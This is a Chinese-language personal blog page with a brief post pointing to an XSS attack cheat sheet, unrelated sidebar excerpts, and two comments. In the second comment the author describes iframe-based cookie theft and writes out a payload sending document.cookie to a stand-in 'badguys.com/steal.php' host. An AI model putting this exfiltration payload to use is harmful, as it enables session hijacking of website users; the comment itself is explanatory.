XSS攻擊招式表
好多的攻擊方法啊@@
全文連結
訂閱:
張貼留言 (Atom)
造訪人次
Popular Posts
-
信賴運算的靈魂就是 Trusted Platform Module ,它可以是軟體,也可以是鑲嵌在主機板上的晶片,不過為了安全性考量,應該是採用硬體製作。每個 TPM 都會內建一對獨一無二的公共密碼學金鑰,稱為 Endorsement key ( EK )。 ...
-
Nightmare sphere SCII單人戰役全破後在網路上閒逛時,發現這款惡魔城的同人,而且網路上評價非常高。又是官方免費下載,就抓回來玩了,結果這兩三天除了吃飯睡覺就全部都在打這款遊戲了。因為太好玩了www,我的感覺甚至比惡魔城月下城之夜還要好玩wwww。 相較於月下,解...
-
今天和母親一起去北投,因為異位性皮膚炎身體不舒服,就附近繞一圈、中間吃飯,就回捷運站結束北投行程。期待已久的餐廳今天還只有賣定食 orz 之後和母親分開逛,去了很久沒去的光華商場和三創,看到熟悉的光華商場和三創一樣熱鬧,不禁想起十多年前身為學生的時候,那時很喜歡打電腦但沒錢買高端...
-
其實這篇文章我從以前就很想寫了XD。所有的一切是我注意到台大法律系有共筆公聽會開始,那時我真的嚇到,天阿,我知道有老師反對寫共筆,但沒想到還有學校系所用召開公聽會禁共筆的方式處理的。結果我去ptt的NTUlaw看,那裡有一位p教授對「共筆現象」大力的反對,還不惜跑到學生班版上和學...
-
呼....有很多非醫學系的人在看這個版,就來寫一下吧。 我當初的志願其實是資工,學測我拿了73級分,台清交三家資工的初試我都過了,不過後來因為父母的期望還有自己對經濟穩定性的考量進了醫學系。 醫學系的功課內容如何呢?醫學系比起高中實在累太多了,當年大學聯考的時候我沒有熬過一次夜,...
-
這次工作又嚴重疲勞,跟主管爭取減量失敗,但主管同意讓我放假,就和家人一起去日本了。疫情之後難得的出國,這次去東京。 成田機場剛下飛機,不得不說一樣都市,東京的空氣比台北、台南好非常多。天空也非常漂亮。 在日本銀座吃到最貴的一餐,A4 和牛涮涮鍋,含服務費總價 18K+ 日圓,... -
先複習一下上次信賴運算的內容:傳統上,內容供應商一旦把內容傳送到本地機器以後就完全失去控制(因為使用者可以「招降」官方的程式,還有可以看透電腦內部所有地方的「千里眼」)。在信賴運算的世界裡,你的機器裡面還有另外一個「值得信賴」的晶片-TPM老大。內容供應商不是把內容直接傳給你,而...
-
http://www.cppgm.org/ 這陣子除了工作以外,最有意義的活動就是參加了CPPGM,挑戰一人徒手打造standard compliant C++ toolchain。不需要做優化,只針對linux x64 platform,但禁一切3rd party code...
-
這大概會是我唯一一次在部落格上面紀錄H game... 會想辦法去找這塊遊戲,原因是因為Fate Stay Night的動畫引起了我龐大的興趣,看網路上翻譯的小說還不過癮,決定去找原始遊戲來玩。 Type Moon當初把FSN動畫化預期的是:花錢做出Fate Stay Night...
-
微軟延宕多年的秘密武器:現在正式定名為Windows Vista的Longhorn帶有許多的新功能,比如完全重新設計過的檔案搜尋功能,全新的使用者介面Aero,疑似要搶奪pdf市場的metro等等。 但是其實未來Windows系列中微軟最重視的功能應該是對於信賴運算的支援。 話說...
2 意見:
你最近有想要當黑人的傾向喔 XDD
哈哈 :P
沒有啦...只是作javascript的時候被firefox用exception砸到死,然後研究過程中自然就會碰到這些東西orz,畢竟這些exception都是為了防備XSS而存在的嘛orz
不過有種說法是,其實XSS防禦的罩門是iframe....因為iframe的src可以指定自己domain以外的來源,這是為了服務廣告商而留下來的歷史遺跡,不可能禁止。所以有種說法是用document.cookie抓到想要的東西後指定iframe src="badguys.com/steal.php?usercookie="+document.cookie就可以實際把request送出去,而雖然因為Domain不同,瀏覽器會阻擋main frame存取iframe的contentDocument,不過已經來不及了orz
張貼留言